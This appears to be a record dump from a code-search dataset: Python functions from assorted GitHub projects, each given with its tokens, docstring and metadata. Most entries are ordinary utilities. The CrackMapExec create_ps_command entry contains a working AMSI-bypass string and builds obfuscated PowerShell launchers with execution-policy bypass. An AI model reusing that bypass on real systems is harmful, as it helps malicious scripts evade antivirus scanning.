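CHAIN_LEN = 4
NULL_BYTE = "\x00"

def decode_chain_list(in_bytes):
    # split into CHAIN_LEN-sized chunks, decode as ASCII, and strip the padding
    tot_strings = len(in_bytes) // CHAIN_LEN
    return [in_bytes[i * CHAIN_LEN:(i + 1) * CHAIN_LEN].decode("ascii").strip(NULL_BYTE)
            for i in range(tot_strings)]

print(decode_chain_list(b"A\x00\x00\x00BA\x00\x00"))  # ['A', 'BA']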
mjuenema/python-TSIP
tsip/hlapi.py
https://github.com/mjuenema/python-TSIP/blob/e02b68d05772127ea493cd639b3d5f8fb73df402/tsip/hlapi.py#L136-L160
def unpack(cls, rawpacket): """Instantiate `Packet` from binary string. :param rawpacket: TSIP pkt in binary format. :type rawpacket: String. `rawpacket` must already have framing (DLE...DLE/ETX) removed and byte stuffing reversed. """ structs_ = get_structs_for_rawpacket(rawpacket) for struct_ in structs_: try: return cls(*struct_.unpack(rawpacket)) except struct.error: raise # Try next one. pass # Packet ID 0xff is a pseudo-packet representing # packets unknown to `python-TSIP` in their raw format. # return cls(0xff, rawpacket)
[ "def", "unpack", "(", "cls", ",", "rawpacket", ")", ":", "structs_", "=", "get_structs_for_rawpacket", "(", "rawpacket", ")", "for", "struct_", "in", "structs_", ":", "try", ":", "return", "cls", "(", "*", "struct_", ".", "unpack", "(", "rawpacket", ")", ")", "except", "struct", ".", "error", ":", "raise", "# Try next one.", "pass", "# Packet ID 0xff is a pseudo-packet representing", "# packets unknown to `python-TSIP` in their raw format.", "#", "return", "cls", "(", "0xff", ",", "rawpacket", ")" ]
Instantiate `Packet` from binary string. :param rawpacket: TSIP pkt in binary format. :type rawpacket: String. `rawpacket` must already have framing (DLE...DLE/ETX) removed and byte stuffing reversed.
[ "Instantiate", "Packet", "from", "binary", "string", "." ]
python
train
28.52
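The unpack method above tries each candidate struct layout until one fits; the sketch below reduces that idea to the standard struct module with made-up format strings, so the layouts and the 0xFF pseudo-packet fallback are illustrative only.

import struct

CANDIDATE_FORMATS = [">BBd", ">Bff"]      # hypothetical packet layouts

def unpack_first_match(raw):
    for fmt in CANDIDATE_FORMATS:
        try:
            return struct.unpack(fmt, raw)
        except struct.error:
            continue                      # size/layout mismatch, try the next one
    return (0xFF, raw)                    # unknown packet kept in raw form

print(unpack_first_match(struct.pack(">BBd", 0x8F, 0x20, 1.5)))  # (143, 32, 1.5)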
klahnakoski/pyLibrary
jx_base/language.py
https://github.com/klahnakoski/pyLibrary/blob/fa2dcbc48fda8d26999baef400e9a98149e0b982/jx_base/language.py#L125-L134
def is_op(call, op): """ :param call: The specific operator instance (a method call) :param op: The the operator we are testing against :return: isinstance(call, op), but faster """ try: return call.id == op.id except Exception as e: return False
[ "def", "is_op", "(", "call", ",", "op", ")", ":", "try", ":", "return", "call", ".", "id", "==", "op", ".", "id", "except", "Exception", "as", "e", ":", "return", "False" ]
:param call: The specific operator instance (a method call) :param op: The the operator we are testing against :return: isinstance(call, op), but faster
[ ":", "param", "call", ":", "The", "specific", "operator", "instance", "(", "a", "method", "call", ")", ":", "param", "op", ":", "The", "the", "operator", "we", "are", "testing", "against", ":", "return", ":", "isinstance", "(", "call", "op", ")", "but", "faster" ]
python
train
28.1
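The speed trick in is_op is that each operator class carries a class-level id, so the check is a single attribute comparison; the classes below are invented stand-ins to show the pattern.

class AndOp:
    id = 1

class OrOp:
    id = 2

def is_op(call, op):
    try:
        return call.id == op.id   # one attribute compare instead of isinstance()
    except AttributeError:
        return False

print(is_op(AndOp(), AndOp))   # True
print(is_op(OrOp(), AndOp))    # False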
LISE-B26/pylabcontrol
build/lib/pylabcontrol/src/gui/qt_b26_load_dialog.py
https://github.com/LISE-B26/pylabcontrol/blob/67482e5157fcd1c40705e5c2cacfb93564703ed0/build/lib/pylabcontrol/src/gui/qt_b26_load_dialog.py#L247-L295
def add_script_sequence(self): """ creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree self.tree_loaded """ def empty_tree(tree_model): # COMMENT_ME def add_children_to_list(item, somelist): if item.hasChildren(): for rownum in range(0, item.rowCount()): somelist.append(str(item.child(rownum, 0).text())) output_list = [] root = tree_model.invisibleRootItem() add_children_to_list(root, output_list) tree_model.clear() return output_list name = str(self.txt_script_sequence_name.text()) new_script_list = empty_tree(self.tree_script_sequence_model) new_script_dict = {} for script in new_script_list: if script in self.elements_old: new_script_dict.update({script: self.elements_old[script]}) elif script in self.elements_from_file: new_script_dict.update({script: self.elements_from_file[script]}) new_script_parameter_dict = {} for index, script in enumerate(new_script_list): new_script_parameter_dict.update({script: index}) # QtGui.QTextEdit.toPlainText() # get the module of the current dialogue package = get_python_package(inspect.getmodule(self).__file__) assert package is not None # check that we actually find a module # class_name = Script.set_up_dynamic_script(factory_scripts, new_script_parameter_list, self.cmb_looping_variable.currentText() == 'Parameter Sweep') new_script_dict = {name: {'class': 'ScriptIterator', 'package': package, 'scripts': new_script_dict, 'info': str(self.txt_info.toPlainText()), 'settings': {'script_order': new_script_parameter_dict, 'iterator_type': str(self.cmb_looping_variable.currentText())}}} self.selected_element_name = name self.fill_tree(self.tree_loaded, new_script_dict) self.elements_from_file.update(new_script_dict)
[ "def", "add_script_sequence", "(", "self", ")", ":", "def", "empty_tree", "(", "tree_model", ")", ":", "# COMMENT_ME", "def", "add_children_to_list", "(", "item", ",", "somelist", ")", ":", "if", "item", ".", "hasChildren", "(", ")", ":", "for", "rownum", "in", "range", "(", "0", ",", "item", ".", "rowCount", "(", ")", ")", ":", "somelist", ".", "append", "(", "str", "(", "item", ".", "child", "(", "rownum", ",", "0", ")", ".", "text", "(", ")", ")", ")", "output_list", "=", "[", "]", "root", "=", "tree_model", ".", "invisibleRootItem", "(", ")", "add_children_to_list", "(", "root", ",", "output_list", ")", "tree_model", ".", "clear", "(", ")", "return", "output_list", "name", "=", "str", "(", "self", ".", "txt_script_sequence_name", ".", "text", "(", ")", ")", "new_script_list", "=", "empty_tree", "(", "self", ".", "tree_script_sequence_model", ")", "new_script_dict", "=", "{", "}", "for", "script", "in", "new_script_list", ":", "if", "script", "in", "self", ".", "elements_old", ":", "new_script_dict", ".", "update", "(", "{", "script", ":", "self", ".", "elements_old", "[", "script", "]", "}", ")", "elif", "script", "in", "self", ".", "elements_from_file", ":", "new_script_dict", ".", "update", "(", "{", "script", ":", "self", ".", "elements_from_file", "[", "script", "]", "}", ")", "new_script_parameter_dict", "=", "{", "}", "for", "index", ",", "script", "in", "enumerate", "(", "new_script_list", ")", ":", "new_script_parameter_dict", ".", "update", "(", "{", "script", ":", "index", "}", ")", "# QtGui.QTextEdit.toPlainText()", "# get the module of the current dialogue", "package", "=", "get_python_package", "(", "inspect", ".", "getmodule", "(", "self", ")", ".", "__file__", ")", "assert", "package", "is", "not", "None", "# check that we actually find a module", "# class_name = Script.set_up_dynamic_script(factory_scripts, new_script_parameter_list, self.cmb_looping_variable.currentText() == 'Parameter Sweep')", "new_script_dict", "=", "{", "name", ":", "{", "'class'", ":", "'ScriptIterator'", ",", "'package'", ":", "package", ",", "'scripts'", ":", "new_script_dict", ",", "'info'", ":", "str", "(", "self", ".", "txt_info", ".", "toPlainText", "(", ")", ")", ",", "'settings'", ":", "{", "'script_order'", ":", "new_script_parameter_dict", ",", "'iterator_type'", ":", "str", "(", "self", ".", "cmb_looping_variable", ".", "currentText", "(", ")", ")", "}", "}", "}", "self", ".", "selected_element_name", "=", "name", "self", ".", "fill_tree", "(", "self", ".", "tree_loaded", ",", "new_script_dict", ")", "self", ".", "elements_from_file", ".", "update", "(", "new_script_dict", ")" ]
creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree self.tree_loaded
[ "creates", "a", "script", "sequence", "based", "on", "the", "script", "iterator", "type", "selected", "and", "the", "selected", "scripts", "and", "sends", "it", "to", "the", "tree", "self", ".", "tree_loaded" ]
python
train
44.755102
cni/MRS
MRS/api.py
https://github.com/cni/MRS/blob/16098b3cf4830780efd787fee9efa46513850283/MRS/api.py#L708-L727
def est_gaba_conc(self): """ Estimate gaba concentration based on equation adapted from Sanacora 1999, p1045 Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder, F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical $\gamma$-aminobutyric acid levels in depressed patients determined by proton magnetic resonance spectroscopy. Archives of general psychiatry, 56(11), 1043. """ # need gaba_auc and creatine_auc if not hasattr(self, 'gaba_params'): self.fit_gaba() # estimate [GABA] according to equation9 gaba_conc_est = self.gaba_auc / self.creatine_auc * 1.5 * 9.0 self.gaba_conc_est = gaba_conc_est
[ "def", "est_gaba_conc", "(", "self", ")", ":", "# need gaba_auc and creatine_auc", "if", "not", "hasattr", "(", "self", ",", "'gaba_params'", ")", ":", "self", ".", "fit_gaba", "(", ")", "# estimate [GABA] according to equation9", "gaba_conc_est", "=", "self", ".", "gaba_auc", "/", "self", ".", "creatine_auc", "*", "1.5", "*", "9.0", "self", ".", "gaba_conc_est", "=", "gaba_conc_est" ]
Estimate gaba concentration based on equation adapted from Sanacora 1999, p1045 Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder, F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical $\gamma$-aminobutyric acid levels in depressed patients determined by proton magnetic resonance spectroscopy. Archives of general psychiatry, 56(11), 1043.
[ "Estimate", "gaba", "concentration", "based", "on", "equation", "adapted", "from", "Sanacora", "1999", "p1045" ]
python
train
37.25
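The estimate itself is a single ratio with fixed scaling, as the last line of the method shows; the AUC numbers below are invented placeholders, not real spectroscopy values.

gaba_auc = 0.8        # placeholder area under the GABA peak
creatine_auc = 12.0   # placeholder area under the creatine peak
gaba_conc_est = gaba_auc / creatine_auc * 1.5 * 9.0   # scaling per Sanacora 1999
print(round(gaba_conc_est, 3))   # 0.9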
relekang/python-semantic-release
semantic_release/ci_checks.py
https://github.com/relekang/python-semantic-release/blob/76123f410180599a19e7c48da413880185bbea20/semantic_release/ci_checks.py#L9-L27
def checker(func: Callable) -> Callable: """ A decorator that will convert AssertionErrors into CiVerificationError. :param func: A function that will raise AssertionError :return: The given function wrapped to raise a CiVerificationError on AssertionError """ def func_wrapper(*args, **kwargs): try: func(*args, **kwargs) return True except AssertionError: raise CiVerificationError( 'The verification check for the environment did not pass.' ) return func_wrapper
[ "def", "checker", "(", "func", ":", "Callable", ")", "->", "Callable", ":", "def", "func_wrapper", "(", "*", "args", ",", "*", "*", "kwargs", ")", ":", "try", ":", "func", "(", "*", "args", ",", "*", "*", "kwargs", ")", "return", "True", "except", "AssertionError", ":", "raise", "CiVerificationError", "(", "'The verification check for the environment did not pass.'", ")", "return", "func_wrapper" ]
A decorator that will convert AssertionErrors into CiVerificationError. :param func: A function that will raise AssertionError :return: The given function wrapped to raise a CiVerificationError on AssertionError
[ "A", "decorator", "that", "will", "convert", "AssertionErrors", "into", "CiVerificationError", "." ]
python
train
29.578947
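A generic rendering of the same decorator pattern, with an invented exception name and check so it runs on its own; the point is that any AssertionError inside the wrapped check is converted into one domain-specific error.

from functools import wraps

class VerificationError(Exception):
    pass

def checker(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        try:
            func(*args, **kwargs)
            return True
        except AssertionError:
            raise VerificationError("The verification check did not pass.")
    return wrapper

@checker
def branch_is_master(branch):
    assert branch == "master"

print(branch_is_master("master"))          # True
# branch_is_master("dev") raises VerificationError instead of AssertionError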
sanger-pathogens/Fastaq
pyfastaq/tasks.py
https://github.com/sanger-pathogens/Fastaq/blob/2c775c846d2491678a9637daa320592e02c26c72/pyfastaq/tasks.py#L568-L577
def sort_by_name(infile, outfile): '''Sorts input sequence file by sort -d -k1,1, writes sorted output file.''' seqs = {} file_to_dict(infile, seqs) #seqs = list(seqs.values()) #seqs.sort() fout = utils.open_file_write(outfile) for name in sorted(seqs): print(seqs[name], file=fout) utils.close(fout)
[ "def", "sort_by_name", "(", "infile", ",", "outfile", ")", ":", "seqs", "=", "{", "}", "file_to_dict", "(", "infile", ",", "seqs", ")", "#seqs = list(seqs.values())", "#seqs.sort()", "fout", "=", "utils", ".", "open_file_write", "(", "outfile", ")", "for", "name", "in", "sorted", "(", "seqs", ")", ":", "print", "(", "seqs", "[", "name", "]", ",", "file", "=", "fout", ")", "utils", ".", "close", "(", "fout", ")" ]
Sorts input sequence file by sort -d -k1,1, writes sorted output file.
[ "Sorts", "input", "sequence", "file", "by", "sort", "-", "d", "-", "k1", "1", "writes", "sorted", "output", "file", "." ]
python
valid
33.1
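Reduced to a plain dict and file I/O, the idea is just to iterate the names in sorted order while writing; the FASTA-style formatting and file name below are illustrative, not pyfastaq calls.

seqs = {"chr2": "ACGT", "chr10": "GGCC", "chr1": "TTAA"}
with open("sorted.fa", "w") as fout:
    for name in sorted(seqs):                     # lexicographic, like sort -d -k1,1
        fout.write(">{0}\n{1}\n".format(name, seqs[name]))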
heuer/cablemap
cablemap.core/cablemap/core/handler.py
https://github.com/heuer/cablemap/blob/42066c8fc2972d237a2c35578e14525aaf705f38/cablemap.core/cablemap/core/handler.py#L234-L295
def handle_cable(cable, handler, standalone=True): """\ Emits event from the provided `cable` to the handler. `cable` A cable object. `handler` A ICableHandler instance. `standalone` Indicates if a `start` and `end` event should be issued (default: ``True``). If `standalone` is set to ``False``, no ``handler.start()`` and ``handler.end()`` event will be issued. """ def datetime(dt): date, time = dt.split(u' ') if len(time) == 5: time += u':00' time += u'Z' return u'T'.join([date, time]) if standalone: handler.start() handler.start_cable(cable.reference_id, cable.canonical_id) for iri in cable.wl_uris: handler.handle_wikileaks_iri(iri) handler.handle_creation_datetime(datetime(cable.created)) if cable.released: handler.handle_release_date(cable.released[:10]) if cable.nondisclosure_deadline: handler.handle_nondisclosure_deadline(cable.nondisclosure_deadline) if cable.transmission_id: handler.handle_transmission_id(cable.transmission_id) if cable.subject: handler.handle_subject(cable.subject) if cable.summary: handler.handle_summary(cable.summary) if cable.comment: handler.handle_comment(cable.comment) handler.handle_header(cable.header) handler.handle_content(cable.content) handler.handle_origin(cable.origin) handler.handle_classification(cable.classification) handler.handle_partial(cable.partial) for cat in cable.classification_categories: handler.handle_classification_category(cat) for classificationist in cable.classificationists: handler.handle_classificationist(classificationist) for signer in cable.signers: handler.handle_signer(signer) for tag in cable.tags: handler.handle_tag(tag) for iri in cable.media_uris: handler.handle_media_iri(iri) for rec in cable.recipients: handler.handle_recipient(rec) for rec in cable.info_recipients: handler.handle_info_recipient(rec) for ref in cable.references: handler.handle_reference(ref) handler.end_cable() if standalone: handler.end()
[ "def", "handle_cable", "(", "cable", ",", "handler", ",", "standalone", "=", "True", ")", ":", "def", "datetime", "(", "dt", ")", ":", "date", ",", "time", "=", "dt", ".", "split", "(", "u' '", ")", "if", "len", "(", "time", ")", "==", "5", ":", "time", "+=", "u':00'", "time", "+=", "u'Z'", "return", "u'T'", ".", "join", "(", "[", "date", ",", "time", "]", ")", "if", "standalone", ":", "handler", ".", "start", "(", ")", "handler", ".", "start_cable", "(", "cable", ".", "reference_id", ",", "cable", ".", "canonical_id", ")", "for", "iri", "in", "cable", ".", "wl_uris", ":", "handler", ".", "handle_wikileaks_iri", "(", "iri", ")", "handler", ".", "handle_creation_datetime", "(", "datetime", "(", "cable", ".", "created", ")", ")", "if", "cable", ".", "released", ":", "handler", ".", "handle_release_date", "(", "cable", ".", "released", "[", ":", "10", "]", ")", "if", "cable", ".", "nondisclosure_deadline", ":", "handler", ".", "handle_nondisclosure_deadline", "(", "cable", ".", "nondisclosure_deadline", ")", "if", "cable", ".", "transmission_id", ":", "handler", ".", "handle_transmission_id", "(", "cable", ".", "transmission_id", ")", "if", "cable", ".", "subject", ":", "handler", ".", "handle_subject", "(", "cable", ".", "subject", ")", "if", "cable", ".", "summary", ":", "handler", ".", "handle_summary", "(", "cable", ".", "summary", ")", "if", "cable", ".", "comment", ":", "handler", ".", "handle_comment", "(", "cable", ".", "comment", ")", "handler", ".", "handle_header", "(", "cable", ".", "header", ")", "handler", ".", "handle_content", "(", "cable", ".", "content", ")", "handler", ".", "handle_origin", "(", "cable", ".", "origin", ")", "handler", ".", "handle_classification", "(", "cable", ".", "classification", ")", "handler", ".", "handle_partial", "(", "cable", ".", "partial", ")", "for", "cat", "in", "cable", ".", "classification_categories", ":", "handler", ".", "handle_classification_category", "(", "cat", ")", "for", "classificationist", "in", "cable", ".", "classificationists", ":", "handler", ".", "handle_classificationist", "(", "classificationist", ")", "for", "signer", "in", "cable", ".", "signers", ":", "handler", ".", "handle_signer", "(", "signer", ")", "for", "tag", "in", "cable", ".", "tags", ":", "handler", ".", "handle_tag", "(", "tag", ")", "for", "iri", "in", "cable", ".", "media_uris", ":", "handler", ".", "handle_media_iri", "(", "iri", ")", "for", "rec", "in", "cable", ".", "recipients", ":", "handler", ".", "handle_recipient", "(", "rec", ")", "for", "rec", "in", "cable", ".", "info_recipients", ":", "handler", ".", "handle_info_recipient", "(", "rec", ")", "for", "ref", "in", "cable", ".", "references", ":", "handler", ".", "handle_reference", "(", "ref", ")", "handler", ".", "end_cable", "(", ")", "if", "standalone", ":", "handler", ".", "end", "(", ")" ]
\ Emits event from the provided `cable` to the handler. `cable` A cable object. `handler` A ICableHandler instance. `standalone` Indicates if a `start` and `end` event should be issued (default: ``True``). If `standalone` is set to ``False``, no ``handler.start()`` and ``handler.end()`` event will be issued.
[ "\\", "Emits", "event", "from", "the", "provided", "cable", "to", "the", "handler", "." ]
python
train
35.564516
apache/incubator-mxnet
example/svrg_module/api_usage_example/example_inference.py
https://github.com/apache/incubator-mxnet/blob/1af29e9c060a4c7d60eeaacba32afdb9a7775ba7/example/svrg_module/api_usage_example/example_inference.py#L64-L91
def create_network(batch_size, update_freq): """Create a linear regression network for performing SVRG optimization. :return: an instance of mx.io.NDArrayIter :return: an instance of mx.mod.svrgmodule for performing SVRG optimization """ head = '%(asctime)-15s %(message)s' logging.basicConfig(level=logging.INFO, format=head) data = np.random.randint(1, 5, [1000, 2]) #Test_Train data split n_train = int(data.shape[0] * 0.8) weights = np.array([1.0, 2.0]) label = data.dot(weights) di = mx.io.NDArrayIter(data[:n_train, :], label[:n_train], batch_size=batch_size, shuffle=True, label_name='lin_reg_label') val_iter = mx.io.NDArrayIter(data[n_train:, :], label[n_train:], batch_size=batch_size) X = mx.sym.Variable('data') Y = mx.symbol.Variable('lin_reg_label') fully_connected_layer = mx.sym.FullyConnected(data=X, name='fc1', num_hidden=1) lro = mx.sym.LinearRegressionOutput(data=fully_connected_layer, label=Y, name="lro") mod = SVRGModule( symbol=lro, data_names=['data'], label_names=['lin_reg_label'], update_freq=update_freq, logger=logging) return di, val_iter, mod
[ "def", "create_network", "(", "batch_size", ",", "update_freq", ")", ":", "head", "=", "'%(asctime)-15s %(message)s'", "logging", ".", "basicConfig", "(", "level", "=", "logging", ".", "INFO", ",", "format", "=", "head", ")", "data", "=", "np", ".", "random", ".", "randint", "(", "1", ",", "5", ",", "[", "1000", ",", "2", "]", ")", "#Test_Train data split", "n_train", "=", "int", "(", "data", ".", "shape", "[", "0", "]", "*", "0.8", ")", "weights", "=", "np", ".", "array", "(", "[", "1.0", ",", "2.0", "]", ")", "label", "=", "data", ".", "dot", "(", "weights", ")", "di", "=", "mx", ".", "io", ".", "NDArrayIter", "(", "data", "[", ":", "n_train", ",", ":", "]", ",", "label", "[", ":", "n_train", "]", ",", "batch_size", "=", "batch_size", ",", "shuffle", "=", "True", ",", "label_name", "=", "'lin_reg_label'", ")", "val_iter", "=", "mx", ".", "io", ".", "NDArrayIter", "(", "data", "[", "n_train", ":", ",", ":", "]", ",", "label", "[", "n_train", ":", "]", ",", "batch_size", "=", "batch_size", ")", "X", "=", "mx", ".", "sym", ".", "Variable", "(", "'data'", ")", "Y", "=", "mx", ".", "symbol", ".", "Variable", "(", "'lin_reg_label'", ")", "fully_connected_layer", "=", "mx", ".", "sym", ".", "FullyConnected", "(", "data", "=", "X", ",", "name", "=", "'fc1'", ",", "num_hidden", "=", "1", ")", "lro", "=", "mx", ".", "sym", ".", "LinearRegressionOutput", "(", "data", "=", "fully_connected_layer", ",", "label", "=", "Y", ",", "name", "=", "\"lro\"", ")", "mod", "=", "SVRGModule", "(", "symbol", "=", "lro", ",", "data_names", "=", "[", "'data'", "]", ",", "label_names", "=", "[", "'lin_reg_label'", "]", ",", "update_freq", "=", "update_freq", ",", "logger", "=", "logging", ")", "return", "di", ",", "val_iter", ",", "mod" ]
Create a linear regression network for performing SVRG optimization. :return: an instance of mx.io.NDArrayIter :return: an instance of mx.mod.svrgmodule for performing SVRG optimization
[ "Create", "a", "linear", "regression", "network", "for", "performing", "SVRG", "optimization", ".", ":", "return", ":", "an", "instance", "of", "mx", ".", "io", ".", "NDArrayIter", ":", "return", ":", "an", "instance", "of", "mx", ".", "mod", ".", "svrgmodule", "for", "performing", "SVRG", "optimization" ]
python
train
41.214286
thieman/dagobah
dagobah/core/core.py
https://github.com/thieman/dagobah/blob/e624180c2291034960302c9e0b818b65b5a7ee11/dagobah/core/core.py#L550-L579
def _complete_task(self, task_name, **kwargs): """ Marks this task as completed. Kwargs are stored in the run log. """ logger.debug('Job {0} marking task {1} as completed'.format(self.name, task_name)) self.run_log['tasks'][task_name] = kwargs for node in self.downstream(task_name, self.snapshot): self._start_if_ready(node) try: self.backend.acquire_lock() self._commit_run_log() except: logger.exception("Error in handling events.") finally: self.backend.release_lock() if kwargs.get('success', None) == False: task = self.tasks[task_name] try: self.backend.acquire_lock() if self.event_handler: self.event_handler.emit('task_failed', task._serialize(include_run_logs=True)) except: logger.exception("Error in handling events.") finally: self.backend.release_lock() self._on_completion()
[ "def", "_complete_task", "(", "self", ",", "task_name", ",", "*", "*", "kwargs", ")", ":", "logger", ".", "debug", "(", "'Job {0} marking task {1} as completed'", ".", "format", "(", "self", ".", "name", ",", "task_name", ")", ")", "self", ".", "run_log", "[", "'tasks'", "]", "[", "task_name", "]", "=", "kwargs", "for", "node", "in", "self", ".", "downstream", "(", "task_name", ",", "self", ".", "snapshot", ")", ":", "self", ".", "_start_if_ready", "(", "node", ")", "try", ":", "self", ".", "backend", ".", "acquire_lock", "(", ")", "self", ".", "_commit_run_log", "(", ")", "except", ":", "logger", ".", "exception", "(", "\"Error in handling events.\"", ")", "finally", ":", "self", ".", "backend", ".", "release_lock", "(", ")", "if", "kwargs", ".", "get", "(", "'success'", ",", "None", ")", "==", "False", ":", "task", "=", "self", ".", "tasks", "[", "task_name", "]", "try", ":", "self", ".", "backend", ".", "acquire_lock", "(", ")", "if", "self", ".", "event_handler", ":", "self", ".", "event_handler", ".", "emit", "(", "'task_failed'", ",", "task", ".", "_serialize", "(", "include_run_logs", "=", "True", ")", ")", "except", ":", "logger", ".", "exception", "(", "\"Error in handling events.\"", ")", "finally", ":", "self", ".", "backend", ".", "release_lock", "(", ")", "self", ".", "_on_completion", "(", ")" ]
Marks this task as completed. Kwargs are stored in the run log.
[ "Marks", "this", "task", "as", "completed", ".", "Kwargs", "are", "stored", "in", "the", "run", "log", "." ]
python
train
35.8
byt3bl33d3r/CrackMapExec
cme/helpers/powershell.py
https://github.com/byt3bl33d3r/CrackMapExec/blob/333f1c4e06884e85b2776459963ef85d182aba8e/cme/helpers/powershell.py#L70-L154
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False): amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} """ if force_ps32: command = amsi_bypass + """ $functions = {{ function Command-ToExecute {{ {command} }} }} if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {{ $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32 $job | Wait-Job }} else {{ IEX "$functions" Command-ToExecute }} """.format(command=amsi_bypass + ps_command) else: command = amsi_bypass + ps_command logging.debug('Generated PS command:\n {}\n'.format(command)) # We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently # it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this # it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3 """ if is_powershell_installed(): temp = tempfile.NamedTemporaryFile(prefix='cme_', suffix='.ps1', dir='/tmp') temp.write(command) temp.read() encoding_types = [1,2,3,4,5,6] while True: encoding = random.choice(encoding_types) invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'), temp.name, encoding) logging.debug(invoke_obfs_command) out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip() command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out) logging.debug('Command length: {}'.format(len(command))) if len(command) <= 8192: temp.close() break encoding_types.remove(encoding) else: """ if not dont_obfs: obfs_attempts = 0 while True: command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"' if len(command) <= 8191: break if obfs_attempts == 4: logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command))) exit(1) obfs_attempts += 1 else: command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command)) if len(command) > 8191: logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command))) exit(1) return command
[ "def", "create_ps_command", "(", "ps_command", ",", "force_ps32", "=", "False", ",", "dont_obfs", "=", "False", ")", ":", "amsi_bypass", "=", "\"\"\"[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\ntry{\n[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)\n}catch{}\n\"\"\"", "if", "force_ps32", ":", "command", "=", "amsi_bypass", "+", "\"\"\"\n$functions = {{\n function Command-ToExecute\n {{\n{command}\n }}\n}}\nif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')\n{{\n $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32\n $job | Wait-Job\n}}\nelse\n{{\n IEX \"$functions\"\n Command-ToExecute\n}}\n\"\"\"", ".", "format", "(", "command", "=", "amsi_bypass", "+", "ps_command", ")", "else", ":", "command", "=", "amsi_bypass", "+", "ps_command", "logging", ".", "debug", "(", "'Generated PS command:\\n {}\\n'", ".", "format", "(", "command", ")", ")", "# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently", "# it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this ", "# it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3", "if", "not", "dont_obfs", ":", "obfs_attempts", "=", "0", "while", "True", ":", "command", "=", "'powershell.exe -exec bypass -noni -nop -w 1 -C \"'", "+", "invoke_obfuscation", "(", "command", ")", "+", "'\"'", "if", "len", "(", "command", ")", "<=", "8191", ":", "break", "if", "obfs_attempts", "==", "4", ":", "logger", ".", "error", "(", "'Command exceeds maximum length of 8191 chars (was {}). exiting.'", ".", "format", "(", "len", "(", "command", ")", ")", ")", "exit", "(", "1", ")", "obfs_attempts", "+=", "1", "else", ":", "command", "=", "'powershell.exe -noni -nop -w 1 -enc {}'", ".", "format", "(", "encode_ps_command", "(", "command", ")", ")", "if", "len", "(", "command", ")", ">", "8191", ":", "logger", ".", "error", "(", "'Command exceeds maximum length of 8191 chars (was {}). exiting.'", ".", "format", "(", "len", "(", "command", ")", ")", ")", "exit", "(", "1", ")", "return", "command" ]
if is_powershell_installed(): temp = tempfile.NamedTemporaryFile(prefix='cme_', suffix='.ps1', dir='/tmp') temp.write(command) temp.read() encoding_types = [1,2,3,4,5,6] while True: encoding = random.choice(encoding_types) invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'), temp.name, encoding) logging.debug(invoke_obfs_command) out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip() command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out) logging.debug('Command length: {}'.format(len(command))) if len(command) <= 8192: temp.close() break encoding_types.remove(encoding) else:
[ "if", "is_powershell_installed", "()", ":" ]
python
train
37.894118
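The -enc fallback in the code above relies on PowerShell's -EncodedCommand switch expecting base64 over UTF-16LE text; the helper below shows only that encoding step with a harmless command, and the helper name is illustrative rather than the project's implementation.

import base64

def encode_ps_command(command):
    return base64.b64encode(command.encode("utf_16_le")).decode()

launcher = 'powershell.exe -noni -nop -w 1 -enc {}'.format(
    encode_ps_command('Write-Output "hello"'))
print(len(launcher) <= 8191)   # True: stays under the length limit checked above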
jeffknupp/sandman
sandman/sandmanctl.py
https://github.com/jeffknupp/sandman/blob/253ea4d15cbccd9f0016d66fedd7478614cc0b2f/sandman/sandmanctl.py#L35-L44
def run(generate_pks, show_pks, host, port, uri): """Connect sandman to <URI> and start the API server/admin interface.""" app.config['SQLALCHEMY_DATABASE_URI'] = uri app.config['SANDMAN_GENERATE_PKS'] = generate_pks app.config['SANDMAN_SHOW_PKS'] = show_pks app.config['SERVER_HOST'] = host app.config['SERVER_PORT'] = port activate(name='sandmanctl') app.run(host=host, port=int(port), debug=True)
